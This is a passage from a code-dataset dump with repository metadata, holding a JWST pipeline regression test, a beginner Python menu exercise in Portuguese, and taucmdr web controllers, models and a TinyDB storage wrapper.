"alpha_fraction": 0.4848000109195709, "alphanum_fraction": 0.5776000022888184, "avg_line_length": 38.0625, "blob_id": "2b6acdb4ea12675954d05f0cd66659df15f09844", "content_id": "fc2ad323975d38b882cfb2d0c0c203519769b9f4", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 
1250, "license_type": "permissive", "max_line_length": 82, "num_lines": 32, "path": "/jwst/tests_nightly/general/miri/test_image2pipeline_1.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom jwst.pipeline import Image2Pipeline\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\nclass TestImage2Pipeline(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_image2pipeline', 'truth']\n\n def test_image2pipeline1(self):\n \"\"\"\n Regression test of calwebb_image2 pipeline performed on MIRI data.\n \"\"\"\n input_file = self.get_data('test_image2pipeline',\n 'jw00001001001_01101_00001_mirimage_rate.fits')\n collect_pipeline_cfgs('cfgs')\n Image2Pipeline.call(input_file,\n config_file='cfgs/calwebb_image2.cfg',\n save_results=True\n )\n\n outputs = [('jw00001001001_01101_00001_mirimage_cal.fits',\n 'jw00001001001_01101_00001_mirimage_cal_ref.fits',\n ['primary','sci','err','dq','area']),\n ('jw00001001001_01101_00001_mirimage_i2d.fits',\n 'jw00001001001_01101_00001_mirimage_i2d_ref.fits',\n ['primary','sci','wht','con'])\n ]\n self.compare_outputs(outputs)\n" } ]
94
Brun0C/projeto_python
https://github.com/Brun0C/projeto_python
2e39ee83c6eb437f9b24c3ed9eedb6573ca289d4
ac544bfeb27447e820e4e2b0bd936de00d8b3348
e9b2d33d3f0e54e3f186aee656eecd0af105b49f
refs/heads/main
2023-06-17T17:36:00.553526
2021-07-16T22:05:18
2021-07-16T22:05:18
385,416,177
0
0
MIT
2021-07-12T23:56:27
2021-07-13T00:04:45
2021-07-13T00:43:35
null
[ { "alpha_fraction": 0.7080292105674744, "alphanum_fraction": 0.7080292105674744, "avg_line_length": 21.66666603088379, "blob_id": "8a4e7f8a2d3c1a162d2f0eb7c772c06c6e79eaf2", "content_id": "1f2ca05965cb46a10f6a0d425209b308b02957ad", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 139, "license_type": "permissive", "max_line_length": 43, "num_lines": 6, "path": "/Python/Minha_Biblioteca/criar_menu/pessoas.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "def cadastrar_pessoa():\n print('Pessoa cadastrada com sucesso.')\n\n\ndef listar_pessoas():\n print('Operação realizada com sucesso')\n\n" }, { "alpha_fraction": 0.6348039507865906, "alphanum_fraction": 0.6348039507865906, "avg_line_length": 23.9375, "blob_id": "8511523f31202ba5d3bdd7e3e6f99bce6c78434a", "content_id": "b54036fc7e7cab85c12b999cbf33aa19d7b861d0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 413, "license_type": "permissive", "max_line_length": 91, "num_lines": 16, "path": "/Python/Curso_em_Video/Exercicios/exer115/menu/menus.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "'''\nMódulos contendo os dados para criação dos menus do programa.\n'''\n\ndef menu_principal():\n '''\n Modulo que retorna uma tupla contendo o titulo e as opções para criar o Menu Principal.\n '''\n import pessoa\n \n titulo = 'Menu Principal'\n opcoes = {\n 'Cadastrar pessoa': pessoa.cadastrar,\n 'Listar pessoas cadastradas': pessoa.listar\n }\n return titulo, opcoes\n \n " }, { "alpha_fraction": 0.4912280738353729, "alphanum_fraction": 0.5029239654541016, "avg_line_length": 20.897436141967773, "blob_id": "a71fe37244b3198e2c867d2c8cc7ff81e577a4ba", "content_id": "7aae353d7b66bc27d4e061e03f7b6e714e399d62", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 856, "license_type": "permissive", "max_line_length": 61, "num_lines": 39, "path": "/Python/Curso_em_Video/Exercicios/exer115/pessoa/__init__.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "def apagar():\n pass\n\n\ndef atualizar():\n print('Cadastrada atualizado')\n\n\ndef cadastrar():\n from uteis import cabecalho, limpar_tela\n \n nome = idade = ''\n while True:\n limpar_tela()\n cabecalho(' Cadastrar Pessoa')\n \n if not nome:\n nome = input('Nome: ').strip()\n if not nome:\n continue\n else:\n print(f'Nome: {nome}')\n \n idade = input('Idade: ').strip()\n if not idade.isdecimal():\n print('\\033[31m')\n cabecalho('ERRO!!! 
Insira somente números.', 1.5)\n print('\\033[m')\n input('Pressione ENTER para continuar...')\n continue\n idade = int(idade)\n break\n \n print('\\nPessoa cadastrada\\n')\n input('Pressione ENTER para continuar...')\n\n\ndef listar():\n pass\n\n" }, { "alpha_fraction": 0.4634782671928406, "alphanum_fraction": 0.47217389941215515, "avg_line_length": 29.83783721923828, "blob_id": "76416ddb1467bc724ac0fce62cdc88a9f3326379", "content_id": "4dd25c2b5b94d70511f3df2faebdfc15b4fdbd1a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1159, "license_type": "permissive", "max_line_length": 59, "num_lines": 37, "path": "/Python/Minha_Biblioteca/criar_menu/menu.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "def exibir_menu(titulo: str, opcoes: dict):\n \n from sys import platform\n from IPython.display import clear_output as cls_out\n import os\n \n tamanho_título = len(titulo) + 25\n while True:\n cls_out(wait=True)\n \n if platform == \"linux\" or platform == \"linux2\":\n # linux\n os.system('clear')\n elif platform == \"win32\":\n # Windows...\n #os.system('pause')\n os.system('cls')\n \n print(\n '=' * tamanho_título,\n titulo.upper().center(tamanho_título),\n '=' * tamanho_título,\n sep = '\\n'\n )\n for indice, opcao in enumerate(opcoes, 1):\n print(f'[{indice}] - {opcao}')\n print('\\n[0] - Sair')\n op = str(input('\\nEscolha uma opção: ')).strip()\n if op.isdecimal():\n if int(op) == 0:\n break\n elif 0 < int(op) <= len(opcoes):\n funcao = list(opcoes.values())[int(op) - 1]\n return funcao\n \n print('ERROR!!! Opção inválida.')\n input('Pressione ENTER para continua...')\n \n" }, { "alpha_fraction": 0.6608695387840271, "alphanum_fraction": 0.6608695387840271, "avg_line_length": 35.79999923706055, "blob_id": "f1210c9f15c038821e618ba25d9b8755f6b6fbaa", "content_id": "628aa97141569c48fd60d3e11367210a43374a50", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 927, "license_type": "permissive", "max_line_length": 108, "num_lines": 25, "path": "/Python/Curso_em_Video/Exercicios/exer115/exer115.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "from menu import menus, menu\nfrom uteis import limpar_tela\n\nir_para = menus.menu_principal\nvoltar_para = {}\n\nwhile ir_para:\n limpar_tela()\n dados = ir_para() #se modulo for um menu, retorna uma tupla contendo titulo e opções, senão retorna None\n \n if dados:\n titulo, opcoes = dados #descompacta tupla contendo titulo e opções\n \n while ir_para in list(voltar_para.values()):\n voltar_para.popitem() #remove o valor de 'voltar_para' até que 'ir_para' não esteja contido nele\n\n opcoes.update(voltar_para) #adiciona os valores de 'voltar_para' para serem exibidos no menu\n voltar_para[f'Voltar ao {titulo}'] = ir_para #caminho percorrido entre menus\n\t \n ir_para = menu.exibir_menu(titulo, opcoes) #cria o menu e retorna o caminho do modulo seguinte\n \n else:\n _, ir_para = voltar_para.popitem()\n \nprint('\\nFinalizando o Programa...')\n" }, { "alpha_fraction": 0.6308926939964294, "alphanum_fraction": 0.6339017152786255, "avg_line_length": 25.891891479492188, "blob_id": "08f8a87f18fcafe57b040dd4f1bb8a69587931d9", "content_id": "fec4edcaba0aa8ffd766c78057500eae7344847f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1000, "license_type": "permissive", "max_line_length": 75, "num_lines": 37, "path": 
"/Python/Minha_Biblioteca/criar_menu/menus.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "import clientes, funcionarios, pessoas\n\ndef menu_principal():\n titulo = 'Menu Principal'\n opcoes = {\n menu_pessoa()[0]: menu_pessoa,\n menu_funcionario()[0]: menu_funcionario,\n menu_cliente()[0]: menu_cliente\n }\n return [titulo, opcoes]\n \n \ndef menu_pessoa():\n titulo = 'Dados Pessoas'\n opcoes = {\n 'Cadastrar Nova Pessoa': pessoas.cadastrar_pessoa,\n 'Listar Pessoas Cadastradas': pessoas.listar_pessoas\n }\n return [titulo, opcoes]\n \n \ndef menu_funcionario():\n titulo = 'Dados Funcionários'\n opcoes = {\n 'Cadastrar Novo Funcionário': funcionarios.cadastrar_funcionario,\n 'Listar Funcionários Cadastrados': funcionarios.listar_funcionarios\n }\n return [titulo, opcoes]\n \n \ndef menu_cliente():\n titulo = 'Dados Cliente'\n opcoes = {\n 'Cadastrar Nova Pessoa': clientes.cadastrar_cliente,\n 'Listar Pessoas Cadastradas': clientes.listar_clientes\n }\n return [titulo, opcoes]\n \n" }, { "alpha_fraction": 0.49464139342308044, "alphanum_fraction": 0.5276174545288086, "avg_line_length": 33.42856979370117, "blob_id": "29c0c8d7fa7e4ec2a6005179a8b756109482136f", "content_id": "28cbec0bb927b265fc5e40332d36c3ebc022f214", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1229, "license_type": "permissive", "max_line_length": 73, "num_lines": 35, "path": "/Python/Curso_em_Video/Exercicios/exer115/menu/menu.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "def exibir_menu(titulo, opcoes):\n '''\n --> Cria um menu interativo retornando a opção escolhida.\n :param titulo: string para exibir nome dado ao menu.\n :param opcoes: dicionario de opções para exibir no menu, \n onde a chave é o nome da opção e o valor\n caminho para chamar a função.\n :return: retorna o valor do dicionario, escolhido nas opções do menu.\n '''\n \n from uteis import limpar_tela, cabecalho\n \n while True:\n \n cabecalho(titulo)\n \n for indice, opcao in enumerate(opcoes, 1):\n print(f'\\033[33m[{indice}] - \\033[34m{opcao}\\033[m')\n print('\\n\\033[33m[0] - \\033[34mSair\\033[m\\n')\n \n op = str(input('Escolha uma opção: ')).strip()\n \n if op.isdecimal():\n if int(op) == 0:\n print('Saindo do sistema...')\n break\n elif 0 < int(op) <= len(opcoes):\n funcao = list(opcoes.values())[int(op) - 1]\n return funcao\n\n print('\\033[31m')\n cabecalho('ERRO!!! 
Opção inválida.', 2)\n print('\\033[m' )\n input('Pressione ENTER para continuar...')\n limpar_tela()\n " }, { "alpha_fraction": 0.5150624513626099, "alphanum_fraction": 0.5194709897041321, "avg_line_length": 23.581817626953125, "blob_id": "73f2dbd5af77b613f2a02c9c153d272bdc9aec7e", "content_id": "3677b4e40aadeb9d6f907c4e377e1d7797feb124", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1373, "license_type": "permissive", "max_line_length": 80, "num_lines": 55, "path": "/Python/Curso_em_Video/Exercicios/exer115/uteis/__init__.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "def limpar_tela():\n \n '''\n Limpa todo o conteúdo do console do Jupyter Notebook e do terminar (Prompt).\n '''\n \n from IPython.display import clear_output as cls_out\n from sys import platform\n import os\n \n def no_terminal():\n\n '''\n Limpa todo o conteúdo do terminal (Prompt).\n '''\n\n if platform == \"linux\" or platform == \"linux2\":\n # linux\n os.system('clear')\n elif platform == \"win32\":\n # Windows...\n os.system('cls')\n\n\n def no_jupyter():\n\n '''\n Limpa todo o conteúdo do console do Jupyter Notebook.\n '''\n \n cls_out(wait=True)\n \n \n no_terminal()\n no_jupyter()\n \n \ndef cabecalho(msg: str, num: int = 3):\n '''\n --> Formata uma mensagem colocando-a dentro de uma moldura.\n :param msg: string para exibir nome dado ao menu.\n :param opcoes: dicionario de opções para exibir no menu, \n onde a chave é o nome da opção e o valor\n caminho para chamar a função.\n :return: retorna o valor do dicionario, escolhido nas opções do menu.\n '''\n \n tamanho_msg = int(len(msg) * num + 2)\n \n print(\n '=' * tamanho_msg,\n f'|{msg.upper().center(tamanho_msg-2)}|',\n '=' * tamanho_msg,\n sep = '\\n'\n )\n \n " }, { "alpha_fraction": 0.7346938848495483, "alphanum_fraction": 0.7346938848495483, "avg_line_length": 23.33333396911621, "blob_id": "64da0ba808c43c179ea57a6f9c2f6128046f27a5", "content_id": "a1e408dc14e0796ea89b31b20a8ac1f22df49f30", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "permissive", "max_line_length": 43, "num_lines": 6, "path": "/Python/Minha_Biblioteca/criar_menu/funcionarios.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "def cadastrar_funcionario():\n print('Operação realizada com sucesso')\n\n\ndef listar_funcionarios():\n print('Operação realizada com sucesso')\n\n" }, { "alpha_fraction": 0.7194244861602783, "alphanum_fraction": 0.7194244861602783, "avg_line_length": 22, "blob_id": "32ec04941e146d4a5e69202e143d6ff3cde3a715", "content_id": "978012f7001f62997ca4a87c8b56c83fbab37423", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 143, "license_type": "permissive", "max_line_length": 43, "num_lines": 6, "path": "/Python/Minha_Biblioteca/criar_menu/clientes.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "def cadastrar_cliente():\n print('Operação realizada com sucesso')\n\n\ndef listar_clientes():\n print('Operação realizada com sucesso')\n\n" }, { "alpha_fraction": 0.7251461744308472, "alphanum_fraction": 0.7485380172729492, "avg_line_length": 41.75, "blob_id": "8d77582a587fb9b71f8389ee37aefbcee5668455", "content_id": "0a2b2865666249e7a7e3037a13ef20dbecc09ef7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 171, 
"license_type": "permissive", "max_line_length": 103, "num_lines": 4, "path": "/README.md", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "# My Binder\nhttps://mybinder.org/v2/gh/Brun0C/projeto_python/main\n\n[![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/Brun0C/projeto_python/main)\n" } ]
11
gitter-badger/taucmdr
https://github.com/gitter-badger/taucmdr
94042da5dbf9aecc9c8f5234f3ebd2378980618c
7af0070f4f81b16b3645f5c27e9d42ad72933695
cf806e2af2c23c5e72bef2bb05aa4e62905e4d6c
refs/heads/master
2020-04-01T14:32:10.649292
2015-04-07T23:27:09
2015-04-07T23:27:09
33,911,276
0
0
null
2015-04-14T04:46:17
2015-04-07T23:29:58
2015-04-13T17:31:51
null
[ { "alpha_fraction": 0.5835776925086975, "alphanum_fraction": 0.5835776925086975, "avg_line_length": 16, "blob_id": "5a2a07462a8b086ee131969f4a2cff7c91a9bec9", "content_id": "756b02f0126c70d003cbf80a118649b384bb0d5c", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 341, "license_type": "permissive", "max_line_length": 64, "num_lines": 20, "path": "/commander/api/controllers/FrontpageController.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n * FrontpageController\n *\n * @description :: Server-side logic for managing views\n * @help :: See http://links.sailsjs.org/docs/controllers\n */\n\nmodule.exports = {\n\n /**\n * Render the frontpage\n *\n * @param {Object} req\n * @param {Object} res\n */\n main: function (req, res) {\n res.view('frontpage/main');\n }\n\t\n};\n\n" }, { "alpha_fraction": 0.49934065341949463, "alphanum_fraction": 0.49934065341949463, "avg_line_length": 20.884614944458008, "blob_id": "e68ff79fac002fefd90aa0a35ffba67082db8616", "content_id": "14d20500a61e0e138de656a4e6388797fda12e7a", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2275, "license_type": "permissive", "max_line_length": 75, "num_lines": 104, "path": "/commander/api/controllers/TargetController.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n * TargetController\n *\n * @description :: Server-side logic for managing targets\n * @help :: See http://links.sailsjs.org/docs/controllers\n */\n\n module.exports = {\n\n view: function(req, res, next) {\n Target.find({}).exec(function (err, targets) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n if (!targets) {\n sails.log.warn('No targets found.');\n return next();\n }\n res.view({\n targets: targets\n });\n });\n },\n\n new: function(req, res, next) {\n res.view();\n },\n\n show: function(req, res, next) {\n var id = req.param('id');\n if (!id) return next();\n Target.findOne(id).exec(function (err, target) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n if (!target) {\n sails.log.warn('Target ID '+id+' not found.');\n return next();\n }\n res.view({\n target: target\n });\n });\n },\n\n edit: function(req, res, next) {\n var id = req.param('id');\n if (!id) return next();\n Target.findOne(id).exec(function (err, target) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n if (!target) {\n sails.log.warn('Target ID '+id+' not found.');\n return next();\n }\n res.view({\n target: target\n });\n });\n },\n\n create: function(req, res, next) {\n Target.create(req.params.all()).exec(function (err, target) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n res.redirect('/target');\n });\n },\n\n update: function(req, res, next) {\n var id = req.param('id');\n if (!id) return next();\n Target.update({id: id}, req.params.all()).exec(function (err, target) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n if (!target) {\n sails.log.warn('Target ID '+id+' not found.');\n return next();\n }\n res.redirect('/target/show/'+id);\n });\n },\n\n destroy: function(req, res, next) {\n var id = req.param('id');\n if (!id) return next();\n Target.destroy({id: id}).exec(function (err) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n res.redirect('/target');\n });\n }\n\n};" 
}, { "alpha_fraction": 0.6543057560920715, "alphanum_fraction": 0.6562285423278809, "avg_line_length": 31.945701599121094, "blob_id": "2c8fd1741d0339888f483f99ef0a018256ea7016", "content_id": "9c12ef587e51345c68940c0471f58c3d1d1684dc", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7281, "license_type": "permissive", "max_line_length": 99, "num_lines": 221, "path": "/packages/tau/storage.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief \n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# Sytem modules\nimport os\nfrom tinydb import TinyDB, where\n \n\n# TAU modules\nimport logger\nimport error\nimport util\nimport error\nimport environment as env\n\n\nLOGGER = logger.getLogger(__name__)\n\n\nclass StorageError(error.InternalError):\n \"\"\"\n Indicates that there is a problem with storage\n \"\"\"\n pass\n\n\nclass Storage(object):\n \"\"\"\n TODO: Classdocs\n \"\"\"\n def __init__(self, prefix, db_name='local.json'):\n \"\"\"\n Create the local storage location\n \"\"\"\n self._transaction_count = 0\n try:\n util.mkdirp(prefix)\n LOGGER.debug(\"Created '%s'\" % prefix)\n except:\n raise StorageError('Cannot create directory %r' % path, 'Check that you have `write` access')\n self.dbfile = os.path.join(prefix, db_name)\n try:\n self.db = TinyDB(self.dbfile)\n except:\n raise StorageError('Cannot create %r' % path, 'Check that you have `write` access')\n LOGGER.debug(\"Opened '%s' for read/write\" % self.dbfile)\n \n def __enter__(self):\n \"\"\"\n Initiates the database transaction\n \"\"\"\n if self._transaction_count == 0:\n self._db_copy = self.db._read()\n self._transaction_count += 1\n return self\n \n def __exit__(self, type, value, traceback):\n \"\"\"\n Finalizes the database transaction\n \"\"\"\n self._transaction_count -= 1\n if type and self._transaction_count 
== 0:\n self.db._write(self._db_copy)\n self._db_copy = None\n\n def _getQuery(self, keys, any):\n \"\"\"\n Returns a query object from a dictionary of keys\n \"\"\"\n operator = 'or' if any else 'and'\n def _and(lhs, rhs): return (lhs & rhs)\n def _or(lhs, rhs): return (lhs | rhs)\n join = {'and': _and, 'or': _or}[operator]\n iter = keys.iteritems()\n key, val = iter.next()\n query = (where(key) == val)\n for key, value in iter:\n query = join(query, (where(key) == value))\n return query\n\n def get(self, table_name, keys=None, any=False, eid=None):\n \"\"\"\n Return the record with the specified keys or element id\n \"\"\"\n table = self.db.table(table_name)\n if eid is not None:\n LOGGER.debug(\"%r: get(eid=%r)\" % (table_name, eid))\n return table.get(eid=eid)\n elif keys is not None:\n LOGGER.debug(\"%r: get(keys=%r)\" % (table_name, keys))\n return table.get(self._getQuery(keys, any))\n else:\n return None\n\n def search(self, table_name, keys=None, any=False):\n \"\"\"\n Return a list of records from the specified table that \n match any one of the provided keys\n \"\"\"\n table = self.db.table(table_name)\n if keys:\n LOGGER.debug(\"%r: search(keys=%r)\" % (table_name, keys))\n return table.search(self._getQuery(keys, any))\n else:\n LOGGER.debug(\"%r: all()\" % table_name)\n return table.all()\n\n def match(self, table_name, field, regex=None, test=None):\n \"\"\"\n Return a list of records where 'field' matches 'regex'\n \"\"\"\n table = self.db.table(table_name)\n if test is not None:\n LOGGER.debug('%r: search(where(%r).test(%r))' % (table_name, field, test))\n return table.search(where(field).test(test))\n elif regex is not None:\n LOGGER.debug('%r: search(where(%r).matches(%r))' % (table_name, field, regex))\n return table.search(where(field).matches(regex))\n else:\n LOGGER.debug(\"%r: search(where(%r).matches('.*'))\" % (table_name, field))\n return table.search(where(field).matches('.*'))\n \n def contains(self, table_name, keys=None, any=False, eids=None):\n \"\"\"\n Return True if the specified table contains at least one \n record that matches the provided keys or element IDs\n \"\"\"\n table = self.db.table(table_name)\n if eids is not None:\n LOGGER.debug(\"%r: contains(eids=%r)\" % (table_name, eids))\n if isinstance(eids, list):\n return table.contains(eids=eids)\n else:\n return table.contains(eids=[eids])\n elif keys:\n LOGGER.debug(\"%r: contains(keys=%r)\" % (table_name, keys))\n return table.contains(self._getQuery(keys, any))\n else:\n return False\n\n def insert(self, table_name, fields):\n \"\"\"\n Create a new record in the specified table\n \"\"\"\n LOGGER.debug(\"%r: Inserting %r\" % (table_name, fields))\n return self.db.table(table_name).insert(fields)\n \n def update(self, table_name, fields, keys=None, any=False, eids=None):\n \"\"\"\n Updates the record that matches keys to contain values from fields\n \"\"\"\n table = self.db.table(table_name)\n if eids is not None:\n LOGGER.debug(\"%r: update(%r, eids=%r)\" % (table_name, fields, eids))\n if isinstance(eids, list):\n return table.update(fields, eids=eids)\n else:\n return table.update(fields, eids=[eids])\n else:\n LOGGER.debug(\"%r: update(%r, keys=%r)\" % (table_name, fields, keys))\n return table.update(fields, self._getQuery(keys, any))\n\n def remove(self, table_name, keys=None, any=False, eids=None):\n \"\"\"\n Remove all records that match keys or eids from table_name \n \"\"\"\n table = self.db.table(table_name)\n if eids is not None:\n LOGGER.debug(\"%r: remove(eids=%r)\" % (table_name, 
eids))\n if isinstance(eids, list):\n return table.remove(eids=eids)\n else:\n return table.remove(eids=[eids])\n else:\n LOGGER.debug(\"%r: remove(keys=%r)\" % (table_name, keys))\n return table.remove(self._getQuery(keys, any))\n\n def purge(self, table_name):\n \"\"\"\n Removes all records from the table_name\n \"\"\"\n LOGGER.debug(\"%r: purge()\" % (table_name))\n return self.db.table(table_name).purge()\n\n\nuser_storage = Storage(env.USER_PREFIX, 'local.json')\nsystem_storage = Storage(env.SYSTEM_PREFIX, 'local.json')\n" }, { "alpha_fraction": 0.529411792755127, "alphanum_fraction": 0.529411792755127, "avg_line_length": 14.850000381469727, "blob_id": "a4459e39dfa88f31a14fe76595124317b4a0e512", "content_id": "760c28a3d67973c1fcbe7c3d5ed77248c3a91ead", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 952, "license_type": "permissive", "max_line_length": 108, "num_lines": 60, "path": "/commander/api/models/Target.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n* Target.js\n*\n* @description :: TODO: You might write a short summary of how this model works and what it represents here.\n* @docs :: http://sailsjs.org/#!documentation/models\n*/\n\nmodule.exports = {\n\n schema: true,\n\n attributes: {\n\n // One-to-many association\n user: {\n model: 'User', \n required: true \n },\n\n // Projects this target belongs to\n projects: {\n collection: 'Project',\n via: 'targets'\n },\n\n // Target name\n name: {\n type: 'string',\n required: true\n },\n\n // Host OS\n host_os: {\n type: 'string',\n required: true\n },\n\n // Host architecture\n host_arch: {\n type: 'string',\n required: true\n },\n\n // Coprocessing device architecture\n device_arch: {\n type: 'string'\n },\n\n compilers: {\n collection: 'Compiler',\n via: 'target'\n },\n\n packages: {\n collection: 'Package',\n via: 'target'\n }\n\n }\n};\n\n" }, { "alpha_fraction": 0.657038688659668, "alphanum_fraction": 0.6595625281333923, "avg_line_length": 31.42727279663086, "blob_id": "6ba4ffb31e4a0d52e9f01a981259b4fd756d1171", "content_id": "1ce5a970e225e321e72103b813073fb082942332", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3566, "license_type": "permissive", "max_line_length": 96, "num_lines": 110, "path": "/packages/tau/model/project.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. 
nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport string\nimport shutil\n\n# TAU modules\nimport util\nimport error\nimport environment as env\nimport controller as ctl\n\n\nclass Project(ctl.Controller, ctl.ByName):\n \"\"\"\n Project data model controller\n \"\"\"\n \n attributes = {\n 'name': {\n 'type': 'string',\n 'unique': True,\n 'argparse': {'help': 'Project name',\n 'metavar': '<project_name>'}\n },\n 'targets': {\n 'collection': 'Target',\n 'via': 'projects',\n },\n 'applications': {\n 'collection': 'Application',\n 'via': 'projects',\n },\n 'measurements': {\n 'collection': 'Measurement',\n 'via': 'projects',\n },\n 'experiments': {\n 'collection': 'Experiment',\n 'via': 'project'\n },\n 'prefix': {\n 'type': 'string',\n 'required': True,\n 'defaultsTo': env.USER_PREFIX,\n 'argparse': {'flags': ('--home',),\n 'help': 'Location for all files and experiment data related to this project',\n 'metavar': 'path'}\n },\n }\n\n _valid_name = set(string.digits + string.letters + '-_.')\n \n def prefix(self):\n return os.path.join(self['prefix'], 